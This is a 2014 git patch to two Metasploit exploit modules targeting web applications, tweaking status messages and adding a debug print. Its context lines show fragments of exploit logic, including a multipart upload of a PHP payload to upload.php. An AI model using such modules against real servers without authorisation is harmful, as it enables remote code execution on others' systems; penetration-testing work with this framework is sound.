From 7e2a9a70723ef51487f168578450d31b068012db Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 3 Feb 2014 13:18:34 -0600 Subject: [PATCH] More desc fixes, add a vprint to give a hint --- modules/exploits/unix/webapp/simple_e_document_upload_exec.rb | 2 +- modules/exploits/unix/webapp/skybluecanvas_exec.rb | 2 ++ 2 files changed, 3 insertions(+), 1 deletion(-) diff --git a/modules/exploits/unix/webapp/simple_e_document_upload_exec.rb b/modules/exploits/unix/webapp/simple_e_document_upload_exec.rb index 59a13ca1d0..d6dc1e45b6 100644 --- a/modules/exploits/unix/webapp/simple_e_document_upload_exec.rb +++ b/modules/exploits/unix/webapp/simple_e_document_upload_exec.rb @@ -97,7 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote data.add_part(php, 'application/octet-stream', nil, "form-data; name=\"fileupload\"; filename=\"#{@fname}\"") post_data = data.to_s.gsub(/^\r\n--_Part_/, '--_Part_') - print_status("#{peer} - Uploading malicious file...") + print_status("#{peer} - Uploading PHP payload...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'upload.php'), diff --git a/modules/exploits/unix/webapp/skybluecanvas_exec.rb b/modules/exploits/unix/webapp/skybluecanvas_exec.rb index 6a9f3d4db2..d6c3324dc1 100644 --- a/modules/exploits/unix/webapp/skybluecanvas_exec.rb +++ b/modules/exploits/unix/webapp/skybluecanvas_exec.rb @@ -76,6 +76,8 @@ class Metasploit3 < Msf::Exploit::Remote def exploit uri = normalize_uri(target_uri.path.to_s, "index.php") + vprint_status("#{peer} - Sending request to #{uri}.") + send_request_cgi({ 'method' => 'POST', 'uri' => uri,